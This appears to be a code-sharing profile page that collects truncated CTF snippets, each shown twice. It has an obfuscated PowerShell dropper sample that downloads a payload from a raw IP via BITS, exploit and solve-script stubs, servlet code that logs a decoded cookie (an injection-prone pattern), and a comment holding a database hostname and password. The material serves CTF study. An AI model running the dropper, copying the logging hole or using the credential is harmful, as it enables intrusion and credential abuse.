khr0x40sh

## vn84.ps1
#Sample ps1 dropper from HTB:CA2023 Forensics Interstellar C2 challenge. DO NOT EXECUTE! USE OF THIS IS AT YOUR OWN RISK!
  .("{1}{0}{2}" -f'T','Set-i','em') ('vAriA'+'ble'+':q'+'L'+'z0so')  ( [tYpe]("{0}{1}{2}{3}" -F'SySTEM.i','o.Fi','lE','mode')) ;  &("{0}{2}{1}" -f'set-Vari','E','ABL') l60Yu3  ( [tYPe]("{7}{0}{5}{4}{3}{1}{2}{6}"-F'm.','ph','Y.ae','A','TY.crypTOgR','SeCuRi','S','sYSte'));  .("{0}{2}{1}{3}" -f 'Set-V','i','AR','aBle')  BI34  (  [TyPE]("{4}{7}{0}{1}{3}{2}{8}{5}{10}{6}{9}" -f 'TEm.secU','R','Y.CrY','IT','s','Y.','D','yS','pTogrAPH','E','CrypTOSTReAmmo'));  ${U`Rl} = ("{0}{4}{1}{5}{8}{6}{2}{7}{9}{3}"-f 'htt','4f0','53-41ab-938','d8e51','p://64.226.84.200/9497','8','58','a-ae1bd8','-','6')
${P`TF} = "$env:temp\94974f08-5853-41ab-938a-ae1bd86d8e51"
.("{2}{1}{3}{0}"-f'ule','M','Import-','od') ("{2}{0}{3}{1}"-f 'r','fer','BitsT','ans')
.("{4}{5}{3}{1}{2}{0}"-f'r','-BitsT','ransfe','t','S','tar') -Source ${u`Rl} -Destination ${p`Tf}
${Fs} = &("{1}{0}{2}" -f 'w-Ob','Ne','ject') ("{1}{2}{0}"-f 'eam','

## solve.ps1
$encoding = New-Object System.Text.AsciiEncoding

[System.Net.Sockets.TcpClient] $tcpClient = [System.Net.Sockets.TcpClient]::new("pwnme.maveris.fun", "8888")

$tcpStream = $tcpClient.GetStream()
[System.IO.BinaryReader] $reader = [System.IO.BinaryReader]::new($tcpStream)
[System.IO.BinaryWriter] $writer = [System.IO.BinaryWriter]::new($tcpStream)
$cli = $false
$auth = $false
$res = @()

## whole_lotta_candy_encrypt.py
from Crypto.Util.Padding import pad
from Crypto.Util import Counter
from Crypto.Cipher import AES
import os


class Encryptor:

    def __init__(self):
        self.key = os.urandom(16)

## whole_lotta_candy_server.py
from encrypt import Encryptor
from secret import FLAG
import socketserver
import random
import signal
import json

MODES = ['ECB', 'CBC', 'CFB', 'OFB', 'CTR']


## whole_lotta_candy_solve.py
from pwn import *
import json
import binascii

ip = '127.0.0.1'
port = 1337

r = remote(ip, port)

while True:

## whole_lotta_candy_output.txt
crypto_whole_lotta_candy/solve.py
[x] Opening connection to 127.0.0.1 on port 1337
[x] Opening connection to 127.0.0.1 on port 1337: Trying 127.0.0.1
[+] Opening connection to 127.0.0.1 on port 1337: Done
Please interact with the server using json data!
Selected mode is ECB.

Options:

1.Encrypt flag

## YuleLogExploit.java
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;

public class YuleLogExploit {

        public YuleLogExploit() throws Exception {

                String cmd;

## ProfileServlet2.java
if (!optionalLoginCookie.isPresent() || !CookieHandler.verifyLoginCookie(optionalLoginCookie.get())) {
            out.println(
                    "<h1> You are a not authenticated, kindly login. </h1>");
            request.getRequestDispatcher("login.jsp").include(request, response);
        } else {
...

## ProfileServlet.java
Optional<Cookie> optionalDebugCookie = Arrays.stream(request.getCookies())
                    .filter(cookie -> "debug".equals(cookie.getName()))
                    .findAny();

            //Log debug information for authenticated users
            optionalDebugCookie.ifPresent(cookie -> {
                logger.error(
                        new String(Base64.getDecoder().decode(cookie.getValue())));
            });

## errorMessage.js
function errorMessage() {
  var error = document.getElementById("error")
  if (isNaN(document.getElementById("number").value))
  {

   // Complete the connection to mysqldb
   //  escalator.c45luksaam7a.us-east-1.rds.amazonaws.com
   //   Use credential allen:8%pZ-s^Z+P4d=h@P
   error.textContent = "Under Construction"
   error.style.color = "red"
	#Sample ps1 dropper from HTB:CA2023 Forensics Interstellar C2 challenge. DO NOT EXECUTE! USE OF THIS IS AT YOUR OWN RISK!
	.("{1}{0}{2}" -f'T','Set-i','em') ('vAriA'+'ble'+':q'+'L'+'z0so') ( [tYpe]("{0}{1}{2}{3}" -F'SySTEM.i','o.Fi','lE','mode')) ; &("{0}{2}{1}" -f'set-Vari','E','ABL') l60Yu3 ( [tYPe]("{7}{0}{5}{4}{3}{1}{2}{6}"-F'm.','ph','Y.ae','A','TY.crypTOgR','SeCuRi','S','sYSte')); .("{0}{2}{1}{3}" -f 'Set-V','i','AR','aBle') BI34 ( [TyPE]("{4}{7}{0}{1}{3}{2}{8}{5}{10}{6}{9}" -f 'TEm.secU','R','Y.CrY','IT','s','Y.','D','yS','pTogrAPH','E','CrypTOSTReAmmo')); ${U`Rl} = ("{0}{4}{1}{5}{8}{6}{2}{7}{9}{3}"-f 'htt','4f0','53-41ab-938','d8e51','p://64.226.84.200/9497','8','58','a-ae1bd8','-','6')
	${P`TF} = "$env:temp\94974f08-5853-41ab-938a-ae1bd86d8e51"
	.("{2}{1}{3}{0}"-f'ule','M','Import-','od') ("{2}{0}{3}{1}"-f 'r','fer','BitsT','ans')
	.("{4}{5}{3}{1}{2}{0}"-f'r','-BitsT','ransfe','t','S','tar') -Source ${u`Rl} -Destination ${p`Tf}
	${Fs} = &("{1}{0}{2}" -f 'w-Ob','Ne','ject') ("{1}{2}{0}"-f 'eam','
	$encoding = New-Object System.Text.AsciiEncoding

	[System.Net.Sockets.TcpClient] $tcpClient = [System.Net.Sockets.TcpClient]::new("pwnme.maveris.fun", "8888")

	$tcpStream = $tcpClient.GetStream()
	[System.IO.BinaryReader] $reader = [System.IO.BinaryReader]::new($tcpStream)
	[System.IO.BinaryWriter] $writer = [System.IO.BinaryWriter]::new($tcpStream)
	$cli = $false
	$auth = $false
	$res = @()
	from Crypto.Util.Padding import pad
	from Crypto.Util import Counter
	from Crypto.Cipher import AES
	import os


	class Encryptor:

	def __init__(self):
	self.key = os.urandom(16)
	from encrypt import Encryptor
	from secret import FLAG
	import socketserver
	import random
	import signal
	import json

	MODES = ['ECB', 'CBC', 'CFB', 'OFB', 'CTR']
	from pwn import *
	import json
	import binascii

	ip = '127.0.0.1'
	port = 1337

	r = remote(ip, port)

	while True:
	crypto_whole_lotta_candy/solve.py
	[x] Opening connection to 127.0.0.1 on port 1337
	[x] Opening connection to 127.0.0.1 on port 1337: Trying 127.0.0.1
	[+] Opening connection to 127.0.0.1 on port 1337: Done
	Please interact with the server using json data!
	Selected mode is ECB.

	Options:

	1.Encrypt flag
	import java.io.IOException;
	import java.io.InputStream;
	import java.io.OutputStream;
	import java.net.Socket;

	public class YuleLogExploit {

	public YuleLogExploit() throws Exception {

	String cmd;
	if (!optionalLoginCookie.isPresent() \|\| !CookieHandler.verifyLoginCookie(optionalLoginCookie.get())) {
	out.println(
	"<h1> You are a not authenticated, kindly login. </h1>");
	request.getRequestDispatcher("login.jsp").include(request, response);
	} else {
	...
	Optional<Cookie> optionalDebugCookie = Arrays.stream(request.getCookies())
	.filter(cookie -> "debug".equals(cookie.getName()))
	.findAny();

	//Log debug information for authenticated users
	optionalDebugCookie.ifPresent(cookie -> {
	logger.error(
	new String(Base64.getDecoder().decode(cookie.getValue())));
	});
	function errorMessage() {
	var error = document.getElementById("error")
	if (isNaN(document.getElementById("number").value))
	{

	// Complete the connection to mysqldb
	// escalator.c45luksaam7a.us-east-1.rds.amazonaws.com
	// Use credential allen:8%pZ-s^Z+P4d=h@P
	error.textContent = "Under Construction"
	error.style.color = "red"